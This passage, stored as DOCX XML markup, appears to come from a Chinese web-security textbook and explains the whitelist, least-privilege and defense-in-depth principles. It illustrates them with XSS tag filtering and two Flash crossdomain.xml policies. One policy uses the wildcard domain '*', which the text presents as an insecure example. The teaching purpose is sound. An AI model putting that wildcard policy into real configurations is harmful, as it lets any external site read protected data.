      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>端口是否开放了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Internet</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。但在实际</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>工作过程中，经常会发现有的工程师为了偷懒或图方便，私自改变了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SSH </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的监听端口，比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-26"/>
        </w:rPr>
        <w:t>把 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>的端口从 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>22 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>改到了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2222</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，从而绕过了安全策略。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="202" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>又比如，在网站的生产环境服务器上，应该限制随意安装软件，而需要制定统一的软件版</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>本规范。这个规范的制定，也可以选择白名单的思想来实现。按照白名单的思想，应该根据业务需求，列出一个允许使用的软件以及软件版本的清单，在此清单外的软件则禁止使用。如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>允许工程师在服务器上随意安装软件的话，则可能会因为安全部门不知道、不熟悉这些软件而导致一些漏洞，从而扩大攻击面。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="152"/>
        <w:ind w:left="202" w:right="221" w:firstLine="401"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-27"/>
        </w:rPr>
        <w:t>在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>安全中，对白名单思想的运用也比比皆是。比如应用处理用户提交的富文本时，考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-22"/>
        </w:rPr>
        <w:t>虑到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>的问题，需要做安全检查。常见的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS Filter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>一般是先对用户输入的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>原文作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTML Parse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>，解析成标签对象后，再针对标签匹配 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的规则。这个规则列表就是一个黑白</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>名单。如果选择黑名单的思想，则这套规则里可能是禁用诸如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>&lt;iframe&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>等标签。但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>黑名单可能会有遗漏，比如未来浏览器如果支持新的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>标签，那么此标签可能就不在黑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>名单之中了。如果选择白名单的思想，就能避免这种问题——在规则中，只允许用户输入诸如</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="202" w:right="224"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>&lt;a&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>&lt;img&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>等需要用到的标签。对于如何设计一个好的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>防御方案，在“跨站脚本攻击” 一章中还会详细讲到，不在此赘述了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="152"/>
        <w:ind w:left="202" w:right="123" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>然而，并不是用了白名单就一定安全了。有朋友可能会问，作者刚才讲到选择白名单的思</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t>想会更安全，现在又说不一定，这不是自相矛盾吗？我们可以仔细分析一下白名单思想的本质。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>在前文中提到：“安全问题的本质是信任问题，安全方案也是基于信任来做的”。选择白名单的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>思想，基于白名单来设计安全方案，其实就是信任白名单是好的，是安全的。但是一旦这个信任基础不存在了，那么安全就荡然无存。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="202" w:right="224" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-27"/>
        </w:rPr>
        <w:t>在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Flash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>跨域访问请求里，是通过检查目标资源服务器端的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>crossdomain.xml </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>文件来验证是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>否允许客户端的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Flash </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>跨域发起请求的，它使用的是白名单的思想。比如下面这个策略文件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="307" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="174"/>
      </w:pPr>
      <w:bookmarkStart w:name="1.7.2  纵深防御原则" w:id="42"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="width:411.15pt;height:70pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <w10:anchorlock/>
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;cross-domain-policy&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;allow-access-from domain="*.taobao.com"/&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="20"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;allow-access-from domain="*.taobao.net"/&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;allow-access-from domain="*.taobaocdn.com"/&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;allow-access-from domain="*.tbcdn.cn"/&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="21"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;allow-access-from domain="*.allyes.com"/&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/cross-domain-policy&gt;</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="139"/>
        <w:ind w:left="203" w:right="170" w:firstLine="419"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:44.190029pt;width:411.15pt;height:30pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:2800;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;cross-domain-policy&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="20"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:b/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:b/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;allow-access-from domain="*"/&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/cross-domain-policy&gt;</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>指定了只允许特定域的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Flash </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>对本域发起请求。可是如果这个信任列表中的域名变得不可信了，那么问题就会随之而来。比如：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="77"/>
        <w:ind w:left="203" w:right="223" w:firstLine="420"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>通配符“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>”，代表来自任意域的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>都能访问本域的数据，因此就造成了安全隐患。所</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>以在选择使用白名单时，需要注意避免出现类似通配符“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>”的问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1098" w:val="left" w:leader="none"/>
          <w:tab w:pos="1099" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="133" w:after="0"/>
        <w:ind w:left="1098" w:right="0" w:hanging="895"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>最小权限原则</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Secure By Default </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>的另一层含义就是“最小权限原则”。最小权限原则也是安全设计的基本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>原则之一。最小权限原则要求系统只授予主体必要的权限，而不要过度授权，这样能有效地减少系统、网络、应用、数据库出错的机会。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>比如在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>系统中，一种良好的操作习惯是使用普通账户登录，在执行需要 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>root </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>权限的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>操作时，再通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sudo </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>命令完成。这样能最大化地降低一些误操作导致的风险；同时普通账户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>被盗用后，与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>root </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>帐户被盗用所导致的后果是完全不同的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="156"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>在使用最小权限原则时，需要认真梳理业务所需要的权限，在很多时候，开发者并不会意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>识到业务授予用户的权限过高。在通过访谈了解业务时，可以多设置一些反问句，比如：您确</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>定您的程序一定需要访问 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Internet </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>吗？通过此类问题，来确定业务所需的最小权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1052" w:val="left" w:leader="none"/>
          <w:tab w:pos="1053" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1052" w:right="0" w:hanging="849"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250003" w:id="43"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r>
        <w:rPr>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>纵深防御原则</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="209"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-28"/>
        </w:rPr>
        <w:t>与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Secure by Default </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>一样，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Defense in Depth</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>（纵深防御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>也是设计安全方案时的重要指导思想。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="160"/>
        <w:ind w:left="203" w:right="187" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>纵深防御包含两层含义：首先，要在各个不同层面、不同方面实施安全方案，避免出现疏漏，不同安全方案之间需要相互配合，构成一个整体；其次，要在正确的地方做正确的事情， 即：在解决根本问题的地方实施针对性的安全方案。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="203" w:right="124" w:firstLine="384"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
          <w:w w:val="95"/>
